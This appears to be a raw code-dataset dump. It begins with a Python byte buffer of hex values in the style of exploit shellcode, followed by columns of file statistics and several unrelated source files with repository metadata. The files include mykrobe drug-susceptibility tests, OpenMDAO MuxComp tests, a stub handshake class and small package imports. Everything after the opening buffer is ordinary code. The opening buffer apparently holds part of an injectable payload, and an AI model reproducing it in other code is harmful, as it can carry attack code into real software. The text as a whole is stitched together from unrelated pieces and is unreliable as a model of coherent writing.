buf += "\x51\x08\xac\x1e\x01\xa6\x1f\xdf\xf1\x06\xf0\xb7\x1b"
buf += "\x89\x2f\xa7\x24\x43\x58\x42\xdf\x04\xa7\x3b\xde\xac"
buf += "\x4f\x3e\xe0\x57\xa9\xb7\x06\x0d\xd9\x91\x91\xba\x40"
buf += "\xb8\x69\x5a\x8c\x16\x14\x5c\x06\x95\xe9\x13\xef\xd0"
buf += "\xf9\xc4\x1f\xaf\xa3\x43\x1f\x05\xcb\x08\xb2\xc2\x0b"
buf += "\x46\xaf\x5c\x5c\x0f\x01\x95\x08\xbd\x38\x0f\x2e\x3c"
buf += "\xdc\x68\xea\x9b\x1d\x76\xf3\x6e\x19\x5c\xe3\xb6\xa2"
buf += "\xd8\x57\x67\xf5\xb6\x01\xc1\xaf\x78\xfb\x9b\x1c\xd3"
buf += "\x6b\x5d\x6f\xe4\xed\x62\xba\x92\x11\xd2\x13\xe3\x2e"
buf += "\xdb\xf3\xe3\x57\x01\x64\x0b\x82\x81\x84\xee\x06\xfc"
buf += "\x2c\xb7\xc3\xbd\x30\x48\x3e\x81\x4c\xcb\xca\x7a\xab"
buf += "\xd3\xbf\x7f\xf7\x53\x2c\xf2\x68\x36\x52\xa1\x89\x13"
| 58.068966
| 61
| 0.675178
| 379
| 1,684
| 3
| 0.506596
| 0.010554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.278299
| 0.050475
| 1,684
| 28
| 62
| 60.142857
| 0.43277
| 0
| 0
| 0
| 0
| 0.964286
| 0.833729
| 0.833729
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4fc4ef35df875b9db5179eb056f16dece60bdc1
| 195
|
py
|
Python
|
ttest.py
|
AaPaul/segnet1
|
2e8196a15c2b9ac2b2d5f712c10c4278e8df5dec
|
[
"MIT"
] | null | null | null |
ttest.py
|
AaPaul/segnet1
|
2e8196a15c2b9ac2b2d5f712c10c4278e8df5dec
|
[
"MIT"
] | null | null | null |
ttest.py
|
AaPaul/segnet1
|
2e8196a15c2b9ac2b2d5f712c10c4278e8df5dec
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
import os, sys
import numpy as np
import math
import skimage
import skimage.io
| 19.5
| 46
| 0.835897
| 30
| 195
| 5.433333
| 0.533333
| 0.171779
| 0.245399
| 0.355828
| 0.429448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 195
| 9
| 47
| 21.666667
| 0.964497
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f2013b6d3afe7e6fca516e3757efcc921839062f
| 4,716
|
py
|
Python
|
python/clockwork/tests/mykrobe_test.py
|
oxfordmmm/clockwork
|
be1f6ea49debf8cb2b8f1ba974df2dc567d150fd
|
[
"MIT"
] | 1
|
2020-01-10T06:43:39.000Z
|
2020-01-10T06:43:39.000Z
|
python/clockwork/tests/mykrobe_test.py
|
oxfordmmm/clockwork
|
be1f6ea49debf8cb2b8f1ba974df2dc567d150fd
|
[
"MIT"
] | null | null | null |
python/clockwork/tests/mykrobe_test.py
|
oxfordmmm/clockwork
|
be1f6ea49debf8cb2b8f1ba974df2dc567d150fd
|
[
"MIT"
] | null | null | null |
import unittest
import os
import shutil
from clockwork import mykrobe, utils
modules_dir = os.path.dirname(os.path.abspath(mykrobe.__file__))
data_dir = os.path.join(modules_dir, 'tests', 'data', 'mykrobe')
class TestMykrobe(unittest.TestCase):
def test_run_predict_and_check_susceptibility(self):
'''test run_predict and susceptibility_dict_from_json_file'''
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
mykrobe.run_predict([reads_file], tmp_out, 'sample_name', 'tb')
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
if drug == 'Isoniazid':
self.assertEqual('R', suscept_data[drug]['predict'])
else:
self.assertEqual('S', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_run_predict_and_check_susceptibility_custom_panel(self):
'''test run_predict and susceptibility_dict_from_json_file with custom panel'''
# rerun the prvious test, but with custom probe and js on file. These just have the
# embB_D328Y muatation. Should be susceptible
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
custom_probe = os.path.join(data_dir, 'run_predict.probes.fa')
custom_json = os.path.join(data_dir, 'run_predict.json')
mykrobe.run_predict([reads_file, reads_file], tmp_out, 'sample_name', 'tb', custom_probe_and_json=(custom_probe, custom_json))
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
if drug == 'Ethambutol':
self.assertEqual('S', suscept_data[drug]['predict'])
else:
self.assertEqual('N', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_run_predict_and_check_susceptibility_fake_run_resistant(self):
'''test run_predict and susceptibility_dict_from_json_file in unittest mode with resistant call'''
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
mykrobe.run_predict([reads_file], tmp_out, 'sample_name', 'tb', unittest=True, unittest_resistant=True)
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
if drug == 'Isoniazid':
self.assertEqual('R', suscept_data[drug]['predict'])
else:
self.assertEqual('S', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_run_predict_and_check_susceptibility_fake_run_susceptible(self):
'''test run_predict and susceptibility_dict_from_json_file in unittest mode with no resistant calls'''
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
mykrobe.run_predict([reads_file], tmp_out, 'sample_name', 'tb', unittest=True, unittest_resistant=False)
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
self.assertEqual('S', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_panel_not_built_in(self):
'''test Panel not built-in'''
species = 'tb'
name = 'panel_name'
panel_dir = 'tmp.mykrobe.panel'
custom_probe = os.path.join(data_dir, 'run_predict.probes.fa')
custom_json = os.path.join(data_dir, 'run_predict.json')
panel = mykrobe.Panel(panel_dir)
panel.setup_files(species, name, custom_probe, custom_json)
self.assertTrue(os.path.exists(panel.probes_fasta))
self.assertTrue(os.path.exists(panel.var_to_res_json))
self.assertEqual(species, panel.metadata['species'])
self.assertEqual(name, panel.metadata['name'])
self.assertFalse(panel.metadata['is_built_in'])
shutil.rmtree(panel_dir)
def test_panel_built_in(self):
'''test Panel built-in'''
species = 'tb'
name = 'walker-2015'
panel_dir = 'tmp.mykrobe.panel'
panel = mykrobe.Panel(panel_dir)
panel.setup_files(species, name, None, None)
self.assertEqual(species, panel.metadata['species'])
self.assertEqual(name, panel.metadata['name'])
self.assertTrue(panel.metadata['is_built_in'])
shutil.rmtree(panel_dir)
| 46.693069
| 134
| 0.677481
| 628
| 4,716
| 4.786624
| 0.154459
| 0.07984
| 0.043247
| 0.045243
| 0.825017
| 0.770792
| 0.750166
| 0.709248
| 0.709248
| 0.681304
| 0
| 0.001876
| 0.208651
| 4,716
| 100
| 135
| 47.16
| 0.803591
| 0.103902
| 0
| 0.653846
| 0
| 0
| 0.13001
| 0.053912
| 0
| 0
| 0
| 0
| 0.192308
| 1
| 0.076923
| false
| 0
| 0.051282
| 0
| 0.141026
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48050dae99fe7bd295da8ffa2e3e1b4c7977d671
| 9,512
|
py
|
Python
|
openmdao/components/tests/test_mux_comp.py
|
fzahle/OpenMDAO
|
ce53b0a0862ac1162d5daad7b0ca34ae085ee47c
|
[
"Apache-2.0"
] | 1
|
2016-05-10T17:01:17.000Z
|
2016-05-10T17:01:17.000Z
|
openmdao/components/tests/test_mux_comp.py
|
gsoxley/OpenMDAO
|
709401e535cf6933215abd942d4b4d49dbf61b2b
|
[
"Apache-2.0"
] | 3
|
2016-05-10T16:55:46.000Z
|
2018-10-22T23:28:52.000Z
|
openmdao/components/tests/test_mux_comp.py
|
gsoxley/OpenMDAO
|
709401e535cf6933215abd942d4b4d49dbf61b2b
|
[
"Apache-2.0"
] | 2
|
2018-04-05T15:53:54.000Z
|
2018-10-22T22:48:00.000Z
|
from __future__ import print_function, division, absolute_import
import unittest
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp
from openmdao.utils.assert_utils import assert_rel_error, assert_check_partials
from openmdao.api import MuxComp
class TestMuxCompOptions(unittest.TestCase):
def test_invalid_axis_scalar(self):
nn = 10
p = Problem(model=Group())
ivc = IndepVarComp()
for i in range(nn):
ivc.add_output(name='a_{0}'.format(i), val=1.0)
p.model.add_subsystem(name='ivc', subsys=ivc, promotes_outputs=['*'])
mux_comp = p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=nn))
mux_comp.add_var('a', shape=(1,), axis=2)
for i in range(nn):
p.model.connect('a_{0}'.format(i), 'mux_comp.a_{0}'.format(i))
with self.assertRaises(ValueError) as ctx:
p.setup()
self.assertEqual(str(ctx.exception),
'Cannot mux a 1D inputs for a along axis greater than 1 (2)')
def test_invalid_axis_1D(self):
nn = 10
a_size = 7
b_size = 3
p = Problem(model=Group())
ivc = IndepVarComp()
for i in range(nn):
ivc.add_output(name='a_{0}'.format(i), shape=(a_size,))
ivc.add_output(name='b_{0}'.format(i), shape=(b_size,))
p.model.add_subsystem(name='ivc',
subsys=ivc,
promotes_outputs=['*'])
mux_comp = p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=nn))
mux_comp.add_var('a', shape=(a_size,), axis=0)
mux_comp.add_var('b', shape=(b_size,), axis=2)
for i in range(nn):
p.model.connect('a_{0}'.format(i), 'mux_comp.a_{0}'.format(i))
p.model.connect('b_{0}'.format(i), 'mux_comp.b_{0}'.format(i))
with self.assertRaises(ValueError) as ctx:
p.setup()
self.assertEqual(str(ctx.exception),
'Cannot mux a 1D inputs for b along axis greater than 1 (2)')
class TestMuxCompScalar(unittest.TestCase):
def setUp(self):
self.nn = 10
self.p = Problem(model=Group())
ivc = IndepVarComp()
for i in range(self.nn):
ivc.add_output(name='a_{0}'.format(i), val=1.0)
ivc.add_output(name='b_{0}'.format(i), val=1.0)
self.p.model.add_subsystem(name='ivc',
subsys=ivc,
promotes_outputs=['*'])
mux_comp = self.p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=self.nn))
mux_comp.add_var('a', shape=(1,), axis=0)
mux_comp.add_var('b', shape=(1,), axis=1)
for i in range(self.nn):
self.p.model.connect('a_{0}'.format(i), 'mux_comp.a_{0}'.format(i))
self.p.model.connect('b_{0}'.format(i), 'mux_comp.b_{0}'.format(i))
self.p.setup(force_alloc_complex=True)
for i in range(self.nn):
self.p['a_{0}'.format(i)] = np.random.rand(1)
self.p['b_{0}'.format(i)] = np.random.rand(1)
self.p.run_model()
def test_results(self):
for i in range(self.nn):
out_i = self.p['mux_comp.a'][i]
in_i = self.p['a_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
out_i = self.p['mux_comp.b'][0, i]
in_i = self.p['b_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
def test_partials(self):
np.set_printoptions(linewidth=1024)
cpd = self.p.check_partials(compact_print=False, method='cs', out_stream=None)
assert_check_partials(cpd, atol=1.0E-8, rtol=1.0E-8)
class TestMuxComp1D(unittest.TestCase):
def setUp(self):
self.nn = 10
a_size = 7
b_size = 3
self.p = Problem(model=Group())
ivc = IndepVarComp()
for i in range(self.nn):
ivc.add_output(name='a_{0}'.format(i), shape=(a_size,))
ivc.add_output(name='b_{0}'.format(i), shape=(b_size,))
self.p.model.add_subsystem(name='ivc',
subsys=ivc,
promotes_outputs=['*'])
mux_comp = self.p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=self.nn))
mux_comp.add_var('a', shape=(a_size,), axis=0)
mux_comp.add_var('b', shape=(b_size,), axis=1)
for i in range(self.nn):
self.p.model.connect('a_{0}'.format(i), 'mux_comp.a_{0}'.format(i))
self.p.model.connect('b_{0}'.format(i), 'mux_comp.b_{0}'.format(i))
self.p.setup(force_alloc_complex=True)
for i in range(self.nn):
self.p['a_{0}'.format(i)] = np.random.rand(a_size)
self.p['b_{0}'.format(i)] = np.random.rand(b_size)
self.p.run_model()
def test_results(self):
pass
for i in range(self.nn):
out_i = self.p['mux_comp.a'][i, ...]
in_i = self.p['a_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
out_i = self.p['mux_comp.b'][:, i]
in_i = self.p['b_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
def test_partials(self):
np.set_printoptions(linewidth=1024)
cpd = self.p.check_partials(compact_print=False, method='cs', out_stream=None)
assert_check_partials(cpd, atol=1.0E-8, rtol=1.0E-8)
class TestMuxComp2D(unittest.TestCase):
def setUp(self):
self.nn = 10
a_shape = (3, 3)
b_shape = (2, 4)
self.p = Problem(model=Group())
ivc = IndepVarComp()
for i in range(self.nn):
ivc.add_output(name='a_{0}'.format(i), shape=a_shape)
ivc.add_output(name='b_{0}'.format(i), shape=b_shape)
ivc.add_output(name='c_{0}'.format(i), shape=b_shape)
self.p.model.add_subsystem(name='ivc',
subsys=ivc,
promotes_outputs=['*'])
mux_comp = self.p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=self.nn))
mux_comp.add_var('a', shape=a_shape, axis=0)
mux_comp.add_var('b', shape=b_shape, axis=1)
mux_comp.add_var('c', shape=b_shape, axis=2)
for i in range(self.nn):
self.p.model.connect('a_{0}'.format(i), 'mux_comp.a_{0}'.format(i))
self.p.model.connect('b_{0}'.format(i), 'mux_comp.b_{0}'.format(i))
self.p.model.connect('c_{0}'.format(i), 'mux_comp.c_{0}'.format(i))
self.p.setup(force_alloc_complex=True)
for i in range(self.nn):
self.p['a_{0}'.format(i)] = np.random.rand(*a_shape)
self.p['b_{0}'.format(i)] = np.random.rand(*b_shape)
self.p['c_{0}'.format(i)] = np.random.rand(*b_shape)
self.p.run_model()
def test_results(self):
for i in range(self.nn):
out_i = self.p['mux_comp.a'][i, ...]
in_i = self.p['a_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
out_i = self.p['mux_comp.b'][:, i, :]
in_i = self.p['b_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
out_i = self.p['mux_comp.c'][:, :, i]
in_i = self.p['c_{0}'.format(i)]
assert_rel_error(self, in_i, out_i)
def test_partials(self):
np.set_printoptions(linewidth=1024)
cpd = self.p.check_partials(compact_print=False, method='cs', out_stream=None)
assert_check_partials(cpd, atol=1.0E-8, rtol=1.0E-8)
class TestForDocs(unittest.TestCase):
def test(self):
"""
An example demonstrating a trivial use case of MuxComp
"""
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp, MuxComp, VectorMagnitudeComp
from openmdao.utils.assert_utils import assert_rel_error
# The number of elements to be muxed
n = 3
# The size of each element to be muxed
m = 100
p = Problem(model=Group())
ivc = IndepVarComp()
ivc.add_output(name='x', shape=(m,), units='m')
ivc.add_output(name='y', shape=(m,), units='m')
ivc.add_output(name='z', shape=(m,), units='m')
p.model.add_subsystem(name='ivc',
subsys=ivc,
promotes_outputs=['x', 'y', 'z'])
mux_comp = p.model.add_subsystem(name='mux', subsys=MuxComp(vec_size=n))
mux_comp.add_var('r', shape=(m,), axis=1, units='m')
p.model.add_subsystem(name='vec_mag_comp',
subsys=VectorMagnitudeComp(vec_size=m, length=n, in_name='r',
mag_name='r_mag', units='m'))
p.model.connect('x', 'mux.r_0')
p.model.connect('y', 'mux.r_1')
p.model.connect('z', 'mux.r_2')
p.model.connect('mux.r', 'vec_mag_comp.r')
p.setup()
p['x'] = 1 + np.random.rand(m)
p['y'] = 1 + np.random.rand(m)
p['z'] = 1 + np.random.rand(m)
p.run_model()
# Verify the results against numpy.dot in a for loop.
for i in range(n):
r_i = [p['x'][i], p['y'][i], p['z'][i]]
expected_i = np.sqrt(np.dot(r_i, r_i))
assert_rel_error(self, p.get_val('vec_mag_comp.r_mag')[i], expected_i)
if __name__ == '__main__':
unittest.main()
| 32.8
| 96
| 0.554563
| 1,413
| 9,512
| 3.532909
| 0.101911
| 0.047075
| 0.070513
| 0.037861
| 0.820713
| 0.808894
| 0.776242
| 0.767027
| 0.726963
| 0.67488
| 0
| 0.0197
| 0.284903
| 9,512
| 289
| 97
| 32.913495
| 0.714202
| 0.018818
| 0
| 0.621762
| 0
| 0
| 0.073386
| 0
| 0
| 0
| 0
| 0
| 0.088083
| 1
| 0.062176
| false
| 0.005181
| 0.046632
| 0
| 0.134715
| 0.036269
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48331baee3e3cae0ace1e5e1f868a7d1ce0dc02d
| 151
|
py
|
Python
|
handshake.py
|
Myselfminer/N
|
072a589301d8d8e4395e75c9ea720d6074eff6b6
|
[
"Apache-2.0"
] | 2
|
2015-10-18T07:40:46.000Z
|
2015-10-25T16:03:18.000Z
|
handshake.py
|
Myselfminer/N
|
072a589301d8d8e4395e75c9ea720d6074eff6b6
|
[
"Apache-2.0"
] | 1
|
2015-10-18T11:38:04.000Z
|
2015-10-18T11:38:04.000Z
|
handshake.py
|
Myselfminer/N
|
072a589301d8d8e4395e75c9ea720d6074eff6b6
|
[
"Apache-2.0"
] | null | null | null |
class handshake:
def clientside(Socket_Object):
"""This must be called with the main object from the socket"""
pass#Socket_Object.
| 30.2
| 70
| 0.682119
| 20
| 151
| 5.05
| 0.75
| 0.237624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238411
| 151
| 4
| 71
| 37.75
| 0.878261
| 0.470199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
6faf4a276c74ce99f0dae17a23fa22175362c533
| 107
|
py
|
Python
|
geesedb/connection/__init__.py
|
informagi/GeeseDB
|
b502830cafbcba8676e7e779d13d5bc14ba842f9
|
[
"MIT"
] | 12
|
2021-07-05T12:33:20.000Z
|
2021-10-11T20:44:12.000Z
|
geesedb/connection/__init__.py
|
informagi/GeeseDB
|
b502830cafbcba8676e7e779d13d5bc14ba842f9
|
[
"MIT"
] | 7
|
2021-07-28T20:40:36.000Z
|
2021-10-12T12:31:51.000Z
|
geesedb/connection/__init__.py
|
informagi/GeeseDB
|
b502830cafbcba8676e7e779d13d5bc14ba842f9
|
[
"MIT"
] | null | null | null |
from .connection import get_connection, close_connection
__all__ = ['get_connection', 'close_connection']
| 26.75
| 56
| 0.813084
| 12
| 107
| 6.583333
| 0.5
| 0.329114
| 0.455696
| 0.708861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093458
| 107
| 3
| 57
| 35.666667
| 0.814433
| 0
| 0
| 0
| 0
| 0
| 0.280374
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6fb02fdd66b03f6fe4bef83d6e39926b3126806d
| 160
|
py
|
Python
|
continuum/rehearsal/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 282
|
2020-05-09T21:35:22.000Z
|
2022-03-20T11:29:41.000Z
|
continuum/rehearsal/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 180
|
2020-05-03T09:31:48.000Z
|
2022-03-30T12:12:48.000Z
|
continuum/rehearsal/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 34
|
2020-06-13T14:09:29.000Z
|
2022-03-14T14:05:07.000Z
|
from continuum.rehearsal.herding import herd_random, herd_closest_to_cluster, herd_closest_to_barycenter
from continuum.rehearsal.memory import RehearsalMemory
| 53.333333
| 104
| 0.9
| 21
| 160
| 6.52381
| 0.619048
| 0.189781
| 0.321168
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 160
| 2
| 105
| 80
| 0.913333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.